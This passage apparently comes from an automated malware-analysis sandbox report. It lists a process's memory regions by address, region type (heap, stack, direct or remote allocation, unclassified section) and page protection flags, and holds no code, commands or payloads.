|
heap
|
page read and write
|
||
|
21D1000
|
heap
|
page read and write
|
||
|
2211000
|
heap
|
page read and write
|
||
|
B401DFE000
|
unkown
|
page readonly
|
||
|
2219000
|
heap
|
page read and write
|
||
|
22CB0000
|
heap
|
page read and write
|
||
|
22CB7000
|
heap
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
74C0000
|
direct allocation
|
page read and write
|
||
|
22CEB000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
B400DFE000
|
unkown
|
page readonly
|
||
|
27D1000
|
heap
|
page read and write
|
||
|
228B3000
|
unclassified section
|
page execute and read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
21C70000
|
direct allocation
|
page read and write
|
||
|
2220000
|
heap
|
page read and write
|
||
|
21CCE000
|
stack
|
page read and write
|
||
|
221E000
|
heap
|
page read and write
|
||
|
21E3000
|
heap
|
page read and write
|
||
|
8D37000
|
heap
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
222D000
|
heap
|
page read and write
|
||
|
8877000
|
stack
|
page read and write
|
||
|
52AD000
|
stack
|
page read and write
|
||
|
746E000
|
stack
|
page read and write
|
||
|
4F5000
|
heap
|
page read and write
|
||
|
7D5E000
|
stack
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
1BFC2000000
|
heap
|
page read and write
|
||
|
2217000
|
heap
|
page read and write
|
||
|
8B9C000
|
stack
|
page read and write
|
||
|
222A000
|
heap
|
page read and write
|
||
|
2280000
|
heap
|
page read and write
|
||
|
7DDD000
|
stack
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
223E000
|
heap
|
page read and write
|
||
|
6459000
|
trusted library allocation
|
page read and write
|
||
|
4CE000
|
stack
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
2209000
|
heap
|
page read and write
|
||
|
2228F000
|
stack
|
page read and write
|
||
|
2236000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
2268D000
|
stack
|
page read and write
|
||
|
1BFBBD00000
|
heap
|
page read and write
|
||
|
92F000
|
stack
|
page read and write
|
||
|
6188000
|
heap
|
page read and write
|
||
|
21E2000
|
heap
|
page read and write
|
||
|
6090000
|
heap
|
page read and write
|
||
|
895F000
|
stack
|
page read and write
|
||
|
7DF000
|
stack
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
26A0000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
21DCF000
|
stack
|
page read and write
|
||
|
2250F000
|
stack
|
page read and write
|
||
|
21E1000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
1BFC14DD000
|
heap
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
79DE000
|
stack
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
616E000
|
heap
|
page read and write
|
||
|
1BFBC71A000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
1BFC12D0000
|
trusted library allocation
|
page read and write
|
||
|
221E000
|
heap
|
page read and write
|
||
|
6187000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
2239000
|
heap
|
page read and write
|
||
|
22B2D000
|
unclassified section
|
page execute and read and write
|
||
|
21E6000
|
heap
|
page read and write
|
||
|
26D0000
|
heap
|
page read and write
|
||
|
22BC6000
|
unclassified section
|
page execute and read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
6187000
|
heap
|
page read and write
|
||
|
21B0000
|
heap
|
page read and write
|
||
|
21E5000
|
heap
|
page read and write
|
||
|
618D000
|
heap
|
page read and write
|
||
|
1BFBBE8D000
|
heap
|
page read and write
|
||
|
21E5000
|
heap
|
page read and write
|
||
|
21F4000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
68C000
|
heap
|
page read and write
|
||
|
1BFBCCE0000
|
trusted library section
|
page readonly
|
||
|
94D000
|
heap
|
page read and write
|
||
|
2235000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
1BFBBE92000
|
heap
|
page read and write
|
||
|
221A000
|
heap
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
1BFBBEA2000
|
heap
|
page read and write
|
||
|
99E000
|
stack
|
page read and write
|
||
|
6420000
|
direct allocation
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
21FC000
|
heap
|
page read and write
|
||
|
2CDE000
|
heap
|
page read and write
|
||
|
29CF000
|
stack
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
2236000
|
heap
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
21F9000
|
heap
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
2233000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
25E1000
|
heap
|
page read and write
|
||
|
16C0000
|
remote allocation
|
page execute and read and write
|
||
|
22D19000
|
heap
|
page read and write
|
||
|
1BFC142C000
|
heap
|
page read and write
|
||
|
18F000
|
stack
|
page read and write
|
||
|
343E000
|
stack
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
5BE000
|
stack
|
page read and write
|
||
|
5420000
|
heap
|
page execute and read and write
|
||
|
2DBF000
|
heap
|
page read and write
|
||
|
1BFBBE13000
|
heap
|
page read and write
|
||
|
2ABD000
|
stack
|
page read and write
|
||
|
74D0000
|
direct allocation
|
page read and write
|
||
|
A47000
|
heap
|
page read and write
|
||
|
8C7E000
|
heap
|
page read and write
|
||
|
B4026FB000
|
stack
|
page read and write
|
||
|
4F5000
|
heap
|
page read and write
|
||
|
B401D7E000
|
stack
|
page read and write
|
||
|
B401B7E000
|
stack
|
page read and write
|
||
|
220F000
|
heap
|
page read and write
|
||
|
2E1F000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
1BFC1400000
|
heap
|
page read and write
|
||
|
5E95000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
2226000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
3619000
|
trusted library allocation
|
page read and write
|
||
|
21D0000
|
heap
|
page read and write
|
||
|
6187000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
B400C7F000
|
stack
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
544000
|
heap
|
page read and write
|
||
|
21D0000
|
heap
|
page read and write
|
||
|
26EF000
|
stack
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
21F3000
|
heap
|
page read and write
|
||
|
A0A000
|
heap
|
page read and write
|
||
|
21DC000
|
heap
|
page read and write
|
||
|
8CA6000
|
heap
|
page read and write
|
||
|
351E000
|
heap
|
page read and write
|
||
|
611B000
|
heap
|
page read and write
|
||
|
2219000
|
heap
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
22C20000
|
direct allocation
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page read and write
|
||
|
6183000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
1BFC1505000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
6187000
|
heap
|
page read and write
|
||
|
35E0000
|
trusted library section
|
page read and write
|
||
|
D376000
|
direct allocation
|
page execute and read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
1BFBC602000
|
heap
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
304F000
|
heap
|
page read and write
|
||
|
52E000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
B402D7E000
|
stack
|
page read and write
|
||
|
618D000
|
heap
|
page read and write
|
||
|
B4029FE000
|
unkown
|
page readonly
|
||
|
440000
|
unkown
|
page readonly
|
||
|
82E000
|
stack
|
page read and write
|
||
|
2233000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
1BFC14F4000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
3690000
|
heap
|
page read and write
|
||
|
8BDC000
|
stack
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
21DF000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
2236000
|
heap
|
page read and write
|
||
|
223E000
|
heap
|
page read and write
|
||
|
22A10000
|
unclassified section
|
page execute and read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
4F5000
|
heap
|
page read and write
|
||
|
21F9000
|
heap
|
page read and write
|
||
|
21FE000
|
heap
|
page read and write
|
||
|
21D1000
|
heap
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
22CAE000
|
heap
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
A35000
|
heap
|
page read and write
|
||
|
22CAE000
|
heap
|
page read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
21DC000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
21DF000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
17C000
|
stack
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
21F5000
|
heap
|
page read and write
|
||
|
21D0000
|
heap
|
page read and write
|
||
|
89B0000
|
trusted library allocation
|
page read and write
|
||
|
22CE9000
|
heap
|
page read and write
|
||
|
3698000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
52B0000
|
trusted library allocation
|
page read and write
|
||
|
95E000
|
stack
|
page read and write
|
||
|
33FE000
|
stack
|
page read and write
|
||
|
2275000
|
heap
|
page read and write
|
||
|
B402DFE000
|
unkown
|
page readonly
|
||
|
2219000
|
heap
|
page read and write
|
||
|
2227000
|
heap
|
page read and write
|
||
|
3650000
|
trusted library allocation
|
page read and write
|
||
|
4F5000
|
heap
|
page read and write
|
||
|
7B65000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
7BBA000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
7AF0000
|
direct allocation
|
page read and write
|
||
|
34CE000
|
heap
|
page read and write
|
||
|
B4010FE000
|
stack
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
6450000
|
direct allocation
|
page read and write
|
||
|
22D2A000
|
heap
|
page read and write
|
||
|
23A0000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
6120000
|
heap
|
page read and write
|
||
|
B400D7E000
|
stack
|
page read and write
|
||
|
1BFC148B000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
2236000
|
heap
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
1BFBCCD0000
|
trusted library section
|
page readonly
|
||
|
21E5000
|
heap
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
3390000
|
direct allocation
|
page read and write
|
||
|
7AD0000
|
direct allocation
|
page read and write
|
||
|
3540000
|
direct allocation
|
page read and write
|
||
|
8970000
|
heap
|
page read and write
|
||
|
7D1E000
|
stack
|
page read and write
|
||
|
21D1000
|
heap
|
page read and write
|
||
|
21D1000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
1BFC1390000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
1BFBC801000
|
trusted library allocation
|
page read and write
|
||
|
2ECE000
|
heap
|
page read and write
|
||
|
177000
|
stack
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
22CCF000
|
heap
|
page read and write
|
||
|
617D000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
33C0000
|
direct allocation
|
page read and write
|
||
|
4F5000
|
heap
|
page read and write
|
||
|
8980000
|
trusted library allocation
|
page execute and read and write
|
||
|
2204000
|
heap
|
page read and write
|
||
|
2CD7000
|
heap
|
page read and write
|
||
|
2211000
|
heap
|
page read and write
|
||
|
5D3000
|
heap
|
page read and write
|
||
|
22CCF000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
60E000
|
stack
|
page read and write
|
||
|
21F9000
|
heap
|
page read and write
|
||
|
1BFBBF13000
|
heap
|
page read and write
|
||
|
6185000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
2210000
|
heap
|
page read and write
|
||
|
618E000
|
heap
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page execute and read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
21D1000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
8D01000
|
heap
|
page read and write
|
||
|
2229000
|
heap
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
21DA000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
2229000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
27D1000
|
heap
|
page read and write
|
||
|
2226000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
530E000
|
stack
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
6440000
|
direct allocation
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
6BF000
|
stack
|
page read and write
|
||
|
21C60000
|
direct allocation
|
page read and write
|
||
|
B40207E000
|
stack
|
page read and write
|
||
|
222CB000
|
stack
|
page read and write
|
||
|
B4012FD000
|
stack
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
232E000
|
stack
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
19A000
|
stack
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
B4023FE000
|
unkown
|
page readonly
|
||
|
624000
|
heap
|
page read and write
|
||
|
27D1000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
1BFBBE00000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
2231000
|
heap
|
page read and write
|
||
|
21D9000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
1BFC12C0000
|
trusted library allocation
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
222E000
|
heap
|
page read and write
|
||
|
1BFBBDE0000
|
heap
|
page read and write
|
||
|
C976000
|
direct allocation
|
page execute and read and write
|
||
|
21D1000
|
heap
|
page read and write
|
||
|
1BFC14EC000
|
heap
|
page read and write
|
||
|
2279F000
|
heap
|
page read and write
|
||
|
1BFC1660000
|
remote allocation
|
page read and write
|
||
|
920000
|
trusted library allocation
|
page read and write
|
||
|
2531000
|
heap
|
page read and write
|
||
|
65DD000
|
trusted library allocation
|
page read and write
|
||
|
25F5000
|
heap
|
page read and write
|
||
|
B4025FE000
|
unkown
|
page readonly
|
||
|
2249000
|
heap
|
page read and write
|
||
|
6188000
|
heap
|
page read and write
|
||
|
3603000
|
trusted library allocation
|
page execute and read and write
|
||
|
92F000
|
stack
|
page read and write
|
||
|
430000
|
unkown
|
page read and write
|
||
|
8AD0000
|
trusted library allocation
|
page read and write
|
||
|
B576000
|
direct allocation
|
page execute and read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
54C000
|
heap
|
page read and write
|
||
|
21880000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
B4022FE000
|
unkown
|
page readonly
|
||
|
2CCF000
|
stack
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
2220000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
21D8000
|
heap
|
page read and write
|
||
|
21FE000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
2258000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
2DA5000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
34CF000
|
stack
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
7D9E000
|
stack
|
page read and write
|
||
|
2239000
|
heap
|
page read and write
|
||
|
325B000
|
heap
|
page read and write
|
||
|
21F5000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
21E0000
|
heap
|
page read and write
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
2211000
|
heap
|
page read and write
|
||
|
21D9000
|
heap
|
page read and write
|
||
|
A07000
|
heap
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
22CB0000
|
heap
|
page read and write
|
||
|
34D1000
|
heap
|
page read and write
|
||
|
2211000
|
heap
|
page read and write
|
||
|
8E80000
|
trusted library allocation
|
page read and write
|
||
|
943000
|
heap
|
page read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
B401AFE000
|
unkown
|
page readonly
|
||
|
2219000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
220E000
|
heap
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
21E0000
|
heap
|
page read and write
|
||
|
2198E000
|
stack
|
page read and write
|
||
|
35B0000
|
heap
|
page read and write
|
||
|
1BFC13F0000
|
trusted library allocation
|
page read and write
|
||
|
21D9000
|
heap
|
page read and write
|
||
|
2FDC000
|
stack
|
page read and write
|
||
|
21F3000
|
heap
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
21EE000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
2215000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
624000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
400000
|
unkown
|
page readonly
|
||
|
5C83000
|
trusted library allocation
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
65E3000
|
trusted library allocation
|
page read and write
|
||
|
A176000
|
direct allocation
|
page execute and read and write
|
||
|
2231000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
22CAD000
|
heap
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
21E5000
|
heap
|
page read and write
|
||
|
21F70000
|
remote allocation
|
page read and write
|
||
|
33F0000
|
direct allocation
|
page read and write
|
||
|
7AA0000
|
direct allocation
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
22EFC000
|
heap
|
page read and write
|
||
|
B4019FE000
|
unkown
|
page readonly
|
||
|
B401C7E000
|
stack
|
page read and write
|
||
|
21DC000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
1BFC1443000
|
heap
|
page read and write
|
||
|
22B29000
|
unclassified section
|
page execute and read and write
|
||
|
2ED7000
|
heap
|
page read and write
|
||
|
4CE000
|
stack
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
221E000
|
heap
|
page read and write
|
||
|
1BFC1610000
|
trusted library allocation
|
page read and write
|
||
|
22A66000
|
unclassified section
|
page execute and read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
1BFBBEB8000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
B4020FE000
|
unkown
|
page readonly
|
||
|
345D000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
8A20000
|
trusted library allocation
|
page read and write
|
||
|
8C70000
|
heap
|
page read and write
|
||
|
21F4000
|
heap
|
page read and write
|
||
|
7BED000
|
heap
|
page read and write
|
||
|
21F1000
|
heap
|
page read and write
|
||
|
1BFC1230000
|
trusted library allocation
|
page read and write
|
||
|
1BFC12D0000
|
trusted library allocation
|
page read and write
|
||
|
5431000
|
trusted library allocation
|
page read and write
|
||
|
2C7D000
|
heap
|
page read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
2236000
|
heap
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|